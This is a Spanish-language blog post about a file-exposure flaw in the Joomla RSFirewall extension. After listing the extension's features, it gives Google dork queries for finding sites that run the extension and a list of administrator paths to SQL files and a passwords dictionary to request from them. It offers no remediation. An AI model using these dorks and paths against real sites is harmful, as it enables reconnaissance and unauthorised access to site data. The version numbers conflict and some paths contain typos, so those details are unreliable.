Joomla RSFirewall Components 2.11.25 | Base de datos y divulgación de contraseña

Base de datos y divulgación de contraseña



RSFirewall es una extension de Joomla la cual nos ayuda a proteger nuestro Joomla en contra de ataques e intrusos.

Características principales:
  • Escáner que realiza un seguimiento activo y bloquea cualquier intento de intrusión, como inyección SQL.
  • Si tiene alguna fuga de seguridad, puede establecer el sitio en modo bloqueo.
  • RSFirewall! protege todo el sitio web Joomla!, incluso de las vulnerabilidades de extensiones de terceros.
  • Permite escanear y reparar vulnerabilidades (no son necesarios conocimientos de experto en seguridad).
  • Explora activamente Joomla! archivos sensibles y rechaza los intentos de hackers para cambiarlos.
  • Filtros de cualquier petición, como POST, GET, etc y bloquea los intentos de inyección SQL.
  • Notifica por correo electrónico o incluso por SMS cuando un cierto nivel de alerta se genera.
  • Siempre mantiene informado sobre las actualizaciones de seguridad más recientes.
  • Permite establecer al instalador de extensiones de Joomla! en modo de bloqueo de seguridad, por lo que es imposible que alguien pueda acceder a las áreas protegidas de su sitio web.
  • Protege al usuario administrador de tomas de posesión.
  • Se activa Captcha después de intentos infructuosos de acceso a la administración de Joomla!.
  • Permite establecer un bloqueo de IP por países.

VULNERABILIDAD

RSFirewall en sus versiones 2.11.15 y 2.50 tiene un fallo de seguridad o vulnerabilidad, la cual deja expuesta informacion sensible. Esta informacion sensible consiste en 2 archivos uno de ellos es un archivo .txt llamado "password.txt" el cual contiene una seria de contraseñas, a modo de diccionario.

El segundo archivo .sql el cual tiene diversos nombres como:
  • configuration.data.sql 
  • configuration.sql
  • exceptions.sql 
  • feeds.data.sql 
  • feeds.sql 
  • hashes.data.sql
  • hashes.sql
  • ignored.sql
  • lists.sql
  • logs.sql
  • offenders.sql
Entre otros.

EXPLOTACION 

Para poder explotar esta vulnerabilidad, debemos realizar una busqueda por medio de GoogleHacking con el siguientes dorks:

[*] inurl:''/index.php?option=com_rsfirewall''
[*] inurl:''/administrator/components/com_rsfirewall/''


Una vez identificado un sitio "vulnerable" debemos de probar los siguientes direcciones.
  • /administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql
  • /administrator/components/com_rsfirewall/sql/mysql/configuration.sql 
  • /administrator/components/com_rsfirewall/sql/mysql/exceptions.sql
  • /administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql 
  • /administrator/components/com_rsfirewall/sql/mysql/feeds.sql
  • /administrator/components/com_rsfirewall/sql/mysql/hashes.data.sql
  • /administrator/components/com_rsfirewall/sql/mysql/hashes.sql
  • /administrator/components/com_rsfirewall/sql/mysql/ignored.sql
  • /administrator/components/com_rsfirewall/sql/mysql/lists.sql
  • /administrator/components/com_rsfirewall/sql/mysql/logs.sql
  • /administrator/components/com_rsfirewall/sql/mysql/offenders.sql
  • /administrator/components/com_rsfirewall/sql/mysql/signatures.data.sql
  • /administrator/components/com_rsfirewall/sql/mysql/signatures.sql
  • /administrator/components/com_rsfirewall/sql/mysql/snapshots.sql
  • /administrator/components/com_rsfirewall/sql/mysql/uninstall.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/configuration.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/configuration.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/configuration.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/exceptions.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/feeds.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/feeds.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/hashes.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/hashes.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/ignored.sq
  • /administrator/components/com_rsfirewall/sql/sqlazure/lists.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/logs.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/offenders.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/signatures.data.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/signatures.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/snapshots.sql
  • /administrator/components/com_rsfirewall/sql/sqlazure/uninstall.sql
  • /administrator/components/com_rsfirewall/assets/dictionary/passwords.txt


Vulnerabilidad descubierta por: KingSkrupellos

Publicar un comentario

0 Comentarios

Slider Parnert

Subscribe Text

¿Quieres estar al día con noticias?